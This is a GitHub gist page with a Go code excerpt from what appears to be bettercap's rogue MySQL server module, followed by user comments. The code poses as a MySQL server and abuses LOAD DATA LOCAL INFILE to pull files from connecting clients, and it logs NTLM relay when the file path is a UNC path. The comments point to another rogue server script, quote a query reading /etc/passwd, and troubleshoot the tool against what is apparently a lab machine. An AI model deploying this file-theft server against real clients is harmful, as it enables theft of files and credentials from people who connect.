-
-
Save bmaia/adc503231ffff19a77aaf0c7abd2e895 to your computer and use it in GitHub Desktop.
for mysql.Running() { | |
// tcp listener | |
conn, err := mysql.listener.AcceptTCP() | |
if err != nil { | |
log.Warning("Error while accepting TCP connection: %s", err) | |
continue | |
} | |
// send the mysql greeting | |
conn.Write([]byte(MySQLGreeting)) | |
// read the incoming responses and retrieve infile | |
// TODO: include binary support and files > 16kb | |
b := make([]byte, 16384) | |
bufio.NewReader(conn).Read(b) | |
// parse client capabilities and validate connection | |
// TODO: parse mysql connections properly and | |
// display additional connection attributes | |
clientCapabilities := fmt.Sprintf("%08b", (int(uint32(b[4]) | uint32(b[5])<<8))) | |
if len(clientCapabilities) == 16 { | |
remoteAddress := strings.Split(conn.RemoteAddr().String(), ":")[0] | |
log.Info("MySQL connection from: %s", remoteAddress) | |
loadData := string(clientCapabilities[8]) | |
log.Info("Can Use LOAD DATA LOCAL: %s", loadData) | |
username := bytes.Split(b[36:], []byte{0})[0] | |
log.Info("MySQL Login Request Username: %s", username) | |
// send initial responseOK | |
conn.Write([]byte(FirstResponseOK)) | |
bufio.NewReader(conn).Read(b) | |
conn.Write([]byte(GetFile)) | |
infileLen, err := bufio.NewReader(conn).Read(b) | |
if err != nil { | |
log.Warning("Error while reading buffer: %s", err) | |
continue | |
} | |
// check if the infile is an UNC path | |
if strings.HasPrefix(mysql.infile, "\\") { | |
log.Info("NTLM from '%s' relayed to %s", remoteAddress, mysql.infile) | |
} else { | |
// print the infile content, ignore mysql protocol headers | |
// TODO: include binary support and output to a file | |
log.Info("Retrieving '%s' from %s (%d bytes)\n%s", mysql.infile, remoteAddress, infileLen-9, string(b)[4:infileLen-4]) | |
} | |
// send additional response | |
conn.Write([]byte(SecondResponseOK)) | |
bufio.NewReader(conn).Read(b) | |
} | |
defer conn.Close() | |
(...) |
You can try to use other Rogue MySQL clients like the one below:
https://github.com/allyshka/Rogue-MySql-Server/blob/master/rogue_mysql_server.py
The best thing to do would be to set up a MariaDB 10.3.22 server, use a client to LOAD INDATA, check the mysql packets and try to replay them (see the snippets below for an example):
https://github.com/allyshka/Rogue-MySql-Server/blob/master/rogue_mysql_server.py#L112-L114
load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
The post below is a good (and more recent) reference:
ok i'll give it a try. I did first try https://github.com/allyshka/Rogue-MySql-Server/blob/master/rogue_mysql_server.py but it spat a lot of exceptions and reading your post https://w00tsec.blogspot.com/2018/04/abusing-mysql-local-infile-to-read.html I thought I'd give bettercap a try as everything was integrated
#python rogue_mysql_server.py
error: uncaptured python exception, closing channel <__main__.http_request_handler connected 10.10.10.187:49106 at 0x7fcd7c36f050> (<type 'exceptions.ValueError'>: [/usr/lib/python2.7/asyncore.py|read|83] [/usr/lib/python2.7/asyncore.py|handle_read_event|449] [/usr/lib/python2.7/asynchat.py|handle_read|147] [rogue_mysql_server.py|found_terminator|184])
Just to let you know that your module works great, and that i was to blame.The error came from a malformed sql query
Hey again, I'm having an issue with this tool related to bettercap/bettercap#572 . Basically I get
[sys.log] [war] mysql.server unpexpected buffer size 4
error (I actually also corrected the typo in the main code)I don't really know what it means nor how to troubleshoot.
FIY:
Do you think you could help?